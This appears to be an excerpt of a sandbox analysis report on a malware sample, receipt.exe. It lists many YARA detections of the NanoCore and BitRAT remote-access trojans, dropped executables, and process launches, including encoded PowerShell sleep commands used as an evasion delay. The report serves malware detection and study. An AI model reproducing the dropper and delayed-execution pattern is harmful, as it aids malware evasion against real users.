            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPEDMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPEDMatched rule: MALWARE_Win_BitRAT author = ditekSHen, description = Detects BitRAT RAT, clamav_sig = MALWARE.Win.Trojan.BitRAT
            Source: C:\Users\user\Desktop\receipt.exeCode function: 0_2_01688628
            Source: C:\Users\user\Desktop\receipt.exeCode function: 0_2_01688065
            Source: C:\Users\user\Desktop\receipt.exeCode function: 0_2_0168827D
            Source: C:\Users\user\Desktop\receipt.exeCode function: 12_2_014BC169
            Source: C:\Users\user\Desktop\receipt.exeCode function: 12_2_014B6001
            Source: C:\Users\user\Desktop\receipt.exeCode function: 12_2_056E6A60
            Source: receipt.exeStatic PE information: Resource name: RT_VERSION type: ARC archive data, packed
            Source: Uewizrlgm.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARC archive data, packed
            Source: Cfrstztdf.exe.12.drStatic PE information: Resource name: RT_VERSION type: ARC archive data, packed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
            Source: time[1].exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
            Source: uIyibZtq20fMk9Yx.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
            Source: receipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamethis.exe" vs receipt.exe
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOusxsxgejuvlhh.dll" vs receipt.exe
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamethis.exe" vs receipt.exe
            Source: receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 0000000C.00000003.354725575.0000000004133000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZaholeccyogx.dll" vs receipt.exe
            Source: receipt.exe, 0000000C.00000002.524451344.000000000115A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs receipt.exe
            Source: receipt.exe, 0000000C.00000000.343211523.00000000004E2000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamethis.exe" vs receipt.exe
            Source: receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 0000000C.00000003.352308180.0000000003E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZaholeccyogx.dll" vs receipt.exe
            Source: receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs receipt.exe
            Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs receipt.exe
            Source: receipt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Uewizrlgm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Cfrstztdf.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\receipt.exeFile read: C:\Users\user\Desktop\receipt.exeJump to behavior
            Source: receipt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\receipt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\receipt.exe "C:\Users\user\Desktop\receipt.exe"
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
